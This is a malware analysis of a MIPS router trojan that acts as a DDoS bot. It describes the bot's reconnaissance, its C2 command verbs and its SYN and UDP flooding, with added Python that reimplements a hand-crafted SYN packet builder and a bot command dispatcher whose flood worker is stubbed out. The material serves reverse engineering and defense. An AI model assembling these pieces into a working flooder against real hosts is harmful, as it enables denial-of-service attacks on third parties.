Analysis of a MIPS-Architecture Linux Trojan Targeting Routers

Source: Internet
Author: User

Windows dominates end-user PCs, while Linux is found mainly on servers, so Linux trojans are far less common than Windows ones. Because the MIPS architecture is used in a narrow range of Linux systems (chiefly embedded devices such as routers), Linux trojans for MIPS are rarer still.

Recently a family of MIPS Linux trojans targeting routers was found on the Harbo analysis platform. The attacker first breaks into the victim's router, for example by exploiting a vulnerability, and then implants the trojan. The compromised router becomes a bot that accepts control commands from a remote server and launches DDoS attacks against the IP addresses the server specifies.

I. Basic Information

File format: ELF
Platform: Linux on 32-bit MIPS

II. Hazard Overview

The trojan turns the infected router into a bot: it accepts commands from a remote server and launches TCP SYN or UDP flooding attacks against the targets the server specifies.

III. Brief Analysis

How the sample invokes system calls on MIPS:

On 32-bit MIPS Linux the system-call number is loaded into register $v0 and the `syscall` instruction is executed, with the arguments passed in $a0 to $a3. This sample is not dynamically linked against libc; every system API it uses is wrapped in a small stub of this form, so the stubs are not described again in the analysis below.

Looking up 4170 in the MIPS o32 syscall table gives connect.
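
As an added example (not code from the original analysis or from the trojan), the following Python scans a MIPS32 code blob for the `li $v0, N` / `syscall` pairs that such stubs consist of and names the syscall from a small subset of the o32 table. The stub bytes are constructed for the demonstration, not taken from the sample, and the function name and the search window are the example's own choices.

```python
"""Scan MIPS32 machine code for `li $v0, N ; syscall` stubs and name the syscall."""
import struct

# Subset of the MIPS o32 Linux syscall table (number = 4000 + index),
# from the kernel's asm/unistd.h. Only entries relevant to this kind of sample.
O32_SYSCALLS = {
    4001: "exit", 4002: "fork", 4003: "read", 4004: "write", 4005: "open",
    4006: "close", 4011: "execve", 4037: "kill", 4054: "ioctl", 4063: "dup2",
    4170: "connect", 4172: "getsockname", 4180: "sendto", 4183: "socket",
}

ADDIU_V0_ZERO = 0x24020000  # addiu $v0, $zero, imm16 (what `li $v0, N` assembles to for N < 0x8000)
ORI_V0_ZERO = 0x34020000    # ori $v0, $zero, imm16 (used by `li` for 0x8000 <= N <= 0xFFFF)
SYSCALL_MASK = 0xFC00003F   # opcode SPECIAL, funct 0x0C; the 20-bit code field is ignored
SYSCALL_BITS = 0x0000000C


def find_syscall_stubs(code, big_endian=True, window=4):
    """Return [(offset, syscall_number, name)] for each `li $v0, N ... syscall` pair.

    `window` bounds how many instructions may sit between the li and the syscall;
    argument setup is normally done before the li, but allow a little slack.
    """
    fmt = ">I" if big_endian else "<I"
    words = [struct.unpack(fmt, code[i:i + 4])[0] for i in range(0, len(code) - 3, 4)]
    found = []
    for i, w in enumerate(words):
        if (w & 0xFFFF0000) == ADDIU_V0_ZERO:
            imm = w & 0xFFFF
            num = imm - 0x10000 if imm & 0x8000 else imm   # addiu sign-extends
        elif (w & 0xFFFF0000) == ORI_V0_ZERO:
            num = w & 0xFFFF
        else:
            continue
        for nxt in words[i + 1:i + 1 + window]:
            if (nxt & 0xFFFF0000) in (ADDIU_V0_ZERO, ORI_V0_ZERO):
                break  # $v0 rewritten before any syscall was reached
            if (nxt & SYSCALL_MASK) == SYSCALL_BITS:
                found.append((i * 4, num, O32_SYSCALLS.get(num, "unknown")))
                break
    return found


# Constructed big-endian stub (not bytes from the real sample):
#   li $v0, 4183 ; syscall   -> socket
#   li $v0, 4170 ; syscall   -> connect
#   jr $ra ; nop
SAMPLE_STUB = bytes.fromhex("24021057 0000000c 2402104a 0000000c 03e00008 00000000")

if __name__ == "__main__":
    for off, num, name in find_syscall_stubs(SAMPLE_STUB):
        print("0x%04x: li $v0, %d ; syscall  -> %s" % (off, num, name))
```

Run against a section dumped from a statically linked MIPS ELF (for example with `objcopy -O binary --only-section=.text`), passing `big_endian=False` for little-endian firmware, to get a quick inventory of the system calls the binary wraps.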

1. Obtain the local IP address and routing table

The sample first opens a connection to google.

It then calls getsockname on the connected socket to read back the local IP address the kernel chose for that connection, and saves it.

Once the connection is established, it reads /proc/net/route to obtain the kernel routing table.

2. Obtain the MAC address through ioctl

The MAC address of the network interface is read with the ioctl request SIOCGIFHWADDR.
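
Steps 1 and 2 reproduced in Python as an added example (not the trojan's code and not from the original article): the local-address trick with connect() and getsockname(), a parser for /proc/net/route that accounts for the byte order of the host that produced it, and the SIOCGIFHWADDR ioctl. The probe address 8.8.8.8:53, the interface name eth0 and the route table text are assumptions constructed for the example.

```python
"""Host reconnaissance as the sample does it: local IP via connect()+getsockname(),
routing table from /proc/net/route, MAC address via ioctl(SIOCGIFHWADDR)."""
import fcntl
import socket
import struct

SIOCGIFHWADDR = 0x8927           # from <linux/sockios.h>; same value on every Linux arch
RTF_UP, RTF_GATEWAY = 0x0001, 0x0002


def local_ip(probe=("8.8.8.8", 53)):
    """Let the kernel pick the outbound interface for `probe` and read the chosen
    source address back with getsockname(). On a UDP socket connect() sends nothing
    on the wire; the sample does the same with a TCP connect to google."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.connect(probe)
        return s.getsockname()[0]
    finally:
        s.close()


def hex_to_ip(field, endian):
    """/proc/net/route prints addresses as 8 hex digits of the 32-bit value in the
    host's byte order, so the producer's endianness is needed to decode them."""
    return socket.inet_ntoa(struct.pack(endian + "I", int(field, 16)))


def parse_proc_net_route(text, endian="<"):
    """Parse the text of /proc/net/route. `endian` is "<" for a little-endian host
    and ">" for a big-endian one (MIPS routers come in both flavours)."""
    routes = []
    for line in text.strip().splitlines()[1:]:   # first line is the column header
        f = line.split()
        if len(f) < 8:
            continue
        routes.append({
            "iface": f[0],
            "dest": hex_to_ip(f[1], endian),
            "gateway": hex_to_ip(f[2], endian),
            "flags": int(f[3], 16),
            "metric": int(f[6]),
            "mask": hex_to_ip(f[7], endian),
        })
    return routes


def default_gateway(routes):
    """Return (iface, gateway) of the lowest-metric default route, or None."""
    defaults = [r for r in routes
                if r["dest"] == "0.0.0.0" and r["flags"] & RTF_GATEWAY and r["flags"] & RTF_UP]
    if not defaults:
        return None
    best = min(defaults, key=lambda r: r["metric"])
    return best["iface"], best["gateway"]


def format_mac(raw6):
    return ":".join("%02x" % b for b in raw6)


def mac_address(ifname):
    """ioctl(SIOCGIFHWADDR): the kernel fills a 40-byte struct ifreq whose hardware
    address starts at offset 18 (16-byte ifr_name, then the 2-byte sa_family of the
    embedded sockaddr)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        ifreq = struct.pack("16s24x", ifname.encode())
        res = fcntl.ioctl(s.fileno(), SIOCGIFHWADDR, ifreq)
    finally:
        s.close()
    return format_mac(res[18:24])


# Constructed /proc/net/route text as a little-endian router would print it
# (not captured from the sample or from a real device).
SAMPLE_ROUTE_TABLE = """\
Iface\tDestination\tGateway \tFlags\tRefCnt\tUse\tMetric\tMask\t\tMTU\tWindow\tIRTT
br0\t00000000\t0100A8C0\t0003\t0\t0\t0\t00000000\t0\t0\t0
br0\t0000A8C0\t00000000\t0001\t0\t0\t0\t00FFFFFF\t0\t0\t0
"""

if __name__ == "__main__":
    print("default route:", default_gateway(parse_proc_net_route(SAMPLE_ROUTE_TABLE)))
    try:
        print("local ip:", local_ip(), "mac(eth0):", mac_address("eth0"))
    except OSError as e:             # offline machine, or no interface named eth0
        print("live lookup failed:", e)
```

The byte-order parameter matters when a /proc/net/route dump pulled from a router is examined on an analyst's x86 machine: decoding a big-endian router's table with the wrong order swaps every octet of every address.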

3. Connect to the attacker's remote server

The remote (command-and-control) server address is:

4. Receive and preprocess remote server commands

The client receives a message from the remote server.

The received buffer is then split into tokens and otherwise preprocessed before the command is dispatched.

5. Processing of the remote server command line

A. PING: the remote server checks whether the connection is still alive.

Local processing: the client replies to the remote server with "PONG".

B. GETLOCALIP: the remote server asks the client to upload its local IP address.

Local processing: the client uploads the IP address it obtained earlier.

C. Source: the Source command passes the IP address of the target to the client, which converts the target address from its string form with atoi.

Local processing: the client starts the flooding attack and reports back that flooding is in progress.

D. SUDP: select the flooding attack mode.

Local processing: the client chooses between the TCP and UDP attack methods depending on whether a SUDP command has been received. In UDP mode it forks a child process, which sleeps for the interval sent by the server and then calls sendto repeatedly to flood the target with data.

E. SYN: TCP SYN flooding command word (ignored while SUDP mode is active).

Local processing: the client enters the SYN-sending branch. In TCP attack mode it creates a SOCK_RAW socket and sets an IPPROTO_IP-level socket option so that it can supply the IP header itself (IP_HDRINCL is the option that permits this).

It then fills in the IP header by hand.

Next it computes the TCP checksum, which covers a pseudo-header (source and destination address, protocol and TCP length) as well as the TCP header itself.

The packet is finally sent the same way as in UDP flooding, from a forked child process calling sendto.
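
To make the SYN branch concrete, here is an added Python example (not the sample's code) that builds the IP and TCP headers of a SYN segment by hand and computes both checksums, including the TCP pseudo-header. The addresses and ports are the example's own, and verifying a packet by re-summing it to zero is the standard property of the Internet checksum, not something the article describes.

```python
"""Hand-built IPv4 + TCP SYN segment with both checksums, as a raw-socket SYN
flooder must produce it."""
import random
import socket
import struct


def checksum(data):
    """RFC 1071 Internet checksum: one's-complement sum of 16-bit big-endian words,
    odd trailing byte padded with zero, result complemented."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                       # fold carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ip_header(src, dst, payload_len, proto=socket.IPPROTO_TCP, ident=None):
    """20-byte IPv4 header; its checksum covers the header only."""
    ident = random.randrange(0x10000) if ident is None else ident
    hdr = struct.pack("!BBHHHBBH4s4s",
                      0x45,                  # version 4, IHL 5 (20 bytes)
                      0,                     # DSCP/ECN
                      20 + payload_len,      # total length
                      ident, 0x4000,         # identification; flags=DF, fragment offset 0
                      64, proto, 0,          # TTL, protocol, checksum placeholder
                      socket.inet_aton(src), socket.inet_aton(dst))
    return hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]


def tcp_syn_header(src, dst, sport, dport, seq, window=5840):
    """20-byte TCP header with only SYN set. The checksum is taken over a pseudo-header
    (src, dst, zero, protocol, TCP length) followed by the TCP header, which is the step
    hand-rolled flooders most often get wrong."""
    hdr = struct.pack("!HHIIBBHHH",
                      sport, dport, seq, 0,  # ports, sequence, acknowledgement
                      5 << 4,                # data offset 5 words, no options
                      0x02,                  # flags: SYN
                      window, 0, 0)          # window, checksum placeholder, urgent pointer
    pseudo = struct.pack("!4s4sBBH", socket.inet_aton(src), socket.inet_aton(dst),
                         0, socket.IPPROTO_TCP, len(hdr))
    return hdr[:16] + struct.pack("!H", checksum(pseudo + hdr)) + hdr[18:]


def build_syn(src, dst, sport, dport, seq=None, ident=None):
    """Complete IP+TCP SYN packet, ready for sendto() on a SOCK_RAW socket with
    IP_HDRINCL set (the arrangement the sample uses)."""
    seq = random.getrandbits(32) if seq is None else seq
    tcp = tcp_syn_header(src, dst, sport, dport, seq)
    return ip_header(src, dst, len(tcp), ident=ident) + tcp


def verify_checksums(pkt):
    """Re-sum both headers including their checksum fields; a correct packet gives (0, 0)."""
    ip, tcp = pkt[:20], pkt[20:]
    pseudo = struct.pack("!4s4sBBH", ip[12:16], ip[16:20], 0, ip[9], len(tcp))
    return checksum(ip), checksum(pseudo + tcp)


if __name__ == "__main__":
    pkt = build_syn("192.168.0.10", "10.0.0.1", 40000, 80)
    print(pkt.hex())
    print("checksums re-sum to", verify_checksums(pkt))
    # Transmission (root required) would follow the sample's pattern:
    #   s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
    #   s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
    #   s.sendto(pkt, ("10.0.0.1", 0))
```

A defender can reuse `verify_checksums` on captured traffic: SYN floods from sloppy bots frequently carry a bad TCP checksum because the pseudo-header was omitted, which is a cheap way to separate them from legitimate connection attempts.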

F. KILLATTK: stop the flooding attack.

Local processing: every flooding mode runs in a forked child process, so stopping the attack means killing that child.

The client then notifies the remote server that the child has been killed and the flooding has stopped.

G. LOLNOGTFO: the remote server instructs the client to return to its initial state, either because it received no response data or because it stopped the attack.

Local processing: once the attack child has been killed, the client expects LOLNOGTFO and, on receiving it, resets itself to the initial state. If what arrives instead is anything other than LOLNOGTFO, the client treats communication with the remote server as broken and the client routine simply returns.
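
The command handling of sections 4 and 5, as an added Python example that is not the trojan's code and not from the original article: a bot-side dispatcher with the state the analysis describes (attack mode, target, forked child, reset expectation). The flood child only sleeps, every reply string other than PONG is an assumption, and matching verbs case-insensitively is an assumption as well.

```python
"""Bot-side dispatch of the C2 text protocol described above. The flood worker is
replaced by a harmless sleep loop, but the fork/kill bookkeeping around it is real."""
import os
import signal
import socket
import time


class BotState:
    """Everything the client remembers between C2 messages."""
    def __init__(self, local_ip):
        self.local_ip = local_ip
        self.udp_mode = False      # SUDP switches from TCP SYN to UDP flooding
        self.target = None         # set by "Source <ip>"
        self.attack_pid = None     # pid of the forked flood child while it runs
        self.await_reset = False   # after KILLATTK only LOLNOGTFO is acceptable
        self.alive = True          # cleared when the client gives up on the C2


def parse_command(raw):
    """Split one received buffer into (VERB, args); NULs and blanks are dropped."""
    parts = raw.replace(b"\x00", b"").decode("ascii", "ignore").split()
    return (parts[0].upper(), parts[1:]) if parts else (None, [])


def _idle_worker(target, udp_mode):
    # Stand-in for the flood loop. In the sample the child either calls sendto()
    # repeatedly (UDP mode) or pushes hand-built SYN segments out of a raw socket.
    while True:
        time.sleep(1)


def start_attack(state, worker=_idle_worker):
    """fork() a worker child as the sample does; returns the child pid."""
    if state.attack_pid is not None or state.target is None:
        return state.attack_pid
    pid = os.fork()
    if pid == 0:                               # child: never returns to the dispatcher
        try:
            worker(state.target, state.udp_mode)
        finally:
            os._exit(0)
    state.attack_pid = pid
    return pid


def stop_attack(state):
    """KILLATTK: kill the flood child and reap it. True if one was running."""
    if state.attack_pid is None:
        return False
    os.kill(state.attack_pid, signal.SIGKILL)
    os.waitpid(state.attack_pid, 0)
    state.attack_pid = None
    return True


def handle(state, raw):
    """Process one C2 message; return the reply bytes, or None when silent."""
    verb, args = parse_command(raw)
    if verb == "LOLNOGTFO":                    # back to the initial state
        stop_attack(state)
        state.udp_mode, state.target, state.await_reset = False, None, False
        return None
    if state.await_reset:                      # anything else after KILLATTK: give up
        state.alive = False
        return None
    if verb == "PING":
        return b"PONG"
    if verb == "GETLOCALIP":
        return state.local_ip.encode()
    if verb == "SOURCE" and args:
        try:
            socket.inet_aton(args[0])          # the sample converts the quad with atoi
        except OSError:
            return None                        # not a dotted quad: ignored
        state.target = args[0]
        start_attack(state)
        return b"Flooding " + state.target.encode()   # reply wording is assumed
    if verb == "SUDP":
        state.udp_mode = True
        return None
    if verb == "SYN":
        if state.udp_mode:                     # SYN is meaningless in SUDP mode
            return None
        start_attack(state)                    # needs a prior Source <ip>
        return None
    if verb == "KILLATTK":
        if stop_attack(state):
            state.await_reset = True
            return b"Attack killed"            # reply wording is assumed
        return None
    return None                                # unknown verb: ignored
```

Feeding this dispatcher from a fake C2 in a sandbox is a practical way to confirm the command semantics recovered from disassembly: each verb's effect on `BotState` can be checked directly instead of inferred from network traffic.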
